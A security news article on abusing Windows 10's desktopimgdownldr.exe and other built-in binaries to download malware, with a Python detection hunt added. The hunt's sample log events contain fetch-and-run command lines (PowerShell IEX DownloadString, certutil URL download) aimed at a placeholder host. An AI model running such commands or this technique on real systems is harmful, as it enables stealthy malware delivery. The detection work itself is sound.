Windows 10 background image tool can be abused to download malware


A binary in Windows 10 responsible for setting an image for the desktop and lock screen can help attackers download malware on a compromised system without raising the alarm.


Known as living-off-the-land binaries (LoLBins), these files ship with the operating system and serve a legitimate purpose. Attackers of all stripes abuse them in post-exploitation phases to hide malicious activity among normal system behavior.


The new LoL in the Bin


An attacker can use LoLBins to download and install malware, or to bypass security controls such as User Account Control (UAC) and Windows Defender Application Control (WDAC). Typically, the attack involves fileless malware and reputable cloud services, so the activity blends in with legitimate traffic.


A report from Cisco Talos last year provides a list of 13 Windows native executables that can download and execute malicious code:


powershell.exe
bitsadmin.exe
certutil.exe
psexec.exe
wmic.exe
mshta.exe
mofcomp.exe
cmstp.exe
windbg.exe
cdb.exe
msbuild.exe
csc.exe
regsvr32.exe

Researchers from SentinelOne discovered that "desktopimgdownldr.exe," located in Windows 10's system32 folder, can also serve as a LoLBin.


The executable is part of the Personalization CSP (configuration service provider), which allows, among other things, defining the lock screen and desktop background images.


In both cases, the setting accepts JPG, JPEG, or PNG files that are stored locally or remotely (HTTP and HTTPS URLs are supported).
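As an added example (not code from the article, SentinelOne, or Cisco Talos), here is a small Python hunt over process-creation telemetry that flags executions of the downloader binaries listed above, desktopimgdownldr.exe included, whenever the command line carries an HTTP/S URL, and additionally marks a desktopimgdownldr.exe fetch whose target is not a JPG, JPEG or PNG. The event fields mimic Sysmon Event ID 1 (Image, CommandLine, ParentImage, IntegrityLevel); the sample events, hostnames and the command-line switches inside them are constructed for this example and are not taken from the article.

```python
"""Hunt for LoLBin downloads in process-creation telemetry (added example)."""
import json
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# The 13 binaries from the Talos list plus SentinelOne's desktopimgdownldr.exe.
DOWNLOADER_LOLBINS = frozenset({
    "powershell.exe", "bitsadmin.exe", "certutil.exe", "psexec.exe",
    "wmic.exe", "mshta.exe", "mofcomp.exe", "cmstp.exe", "windbg.exe",
    "cdb.exe", "msbuild.exe", "csc.exe", "regsvr32.exe",
    "desktopimgdownldr.exe",
})
# Image types the Personalization CSP setting accepts.
IMAGE_EXTENSIONS = {"jpg", "jpeg", "png"}
URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.IGNORECASE)


@dataclass
class Finding:
    image: str           # lower-cased executable name
    url: str             # first URL found on the command line
    parent: str          # parent process name
    elevated: bool       # IntegrityLevel High or System
    odd_extension: bool  # desktopimgdownldr.exe fetching a non-image URL


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def url_extension(url: str) -> str:
    """Extension of the URL path, ignoring query string and fragment."""
    name = url.split("?", 1)[0].split("#", 1)[0].rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def check_event(event: dict) -> Optional[Finding]:
    """Return a Finding if the event is a download through a LoLBin."""
    image = basename(event.get("Image", ""))
    if image not in DOWNLOADER_LOLBINS:
        return None
    match = URL_RE.search(event.get("CommandLine", ""))
    if not match:
        return None
    url = match.group(0)
    return Finding(
        image=image,
        url=url,
        parent=basename(event.get("ParentImage", "")),
        elevated=event.get("IntegrityLevel", "").lower() in ("high", "system"),
        odd_extension=(image == "desktopimgdownldr.exe"
                       and url_extension(url) not in IMAGE_EXTENSIONS),
    )


def hunt(events: Iterable[dict]) -> List[Finding]:
    """Run check_event over event dicts, keeping only the hits."""
    return [f for f in (check_event(e) for e in events) if f is not None]


def hunt_jsonl(text: str) -> List[Finding]:
    """Same, for newline-delimited JSON as exported by most log shippers."""
    return hunt(json.loads(line) for line in text.splitlines() if line.strip())


# Constructed sample events; hosts, URLs and switches are illustrative only
# (the desktopimgdownldr.exe switches are an assumption, not from the article).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\desktopimgdownldr.exe",
     "CommandLine": "desktopimgdownldr.exe /lockscreenurl:https://example.invalid/update.bin /eventName:desktopimgdownldr",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "IntegrityLevel": "Medium"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://example.invalid/a.txt C:\Users\Public\a.txt",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "IntegrityLevel": "High"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x.ps1')\"",
     "ParentImage": r"C:\Windows\System32\mshta.exe", "IntegrityLevel": "Medium"},
    {"Image": r"C:\Windows\System32\notepad.exe",            # not a LoLBin: ignored
     "CommandLine": "notepad.exe https://example.invalid/notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "Medium"},
    {"Image": r"C:\Windows\System32\certutil.exe",           # no URL: ignored
     "CommandLine": "certutil.exe -verify cert.cer",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "IntegrityLevel": "High"},
]
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.image:24} elevated={f.elevated!s:5} parent={f.parent:14} url={f.url}")
```

The URL match, not any particular switch, is what drives the detection, so the rule survives changes in how the binary is invoked. Expect noise from legitimate PowerShell and certutil usage in admin tooling; the parent process and integrity level are the usual pivots for triage, and desktopimgdownldr.exe fetching anything other than an image file deserves a look regardless of who launched it.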


Simple tricks


SentinelOne's Gal Kristal says that running desktopimgdownldr.exe with administrator privileges overrides the user-defined lock screen image, which could tip off the user that something suspicious is going on.


This can be avoided, though, if the attacker deletes a registry value immediately after executing the binary, leavi ..
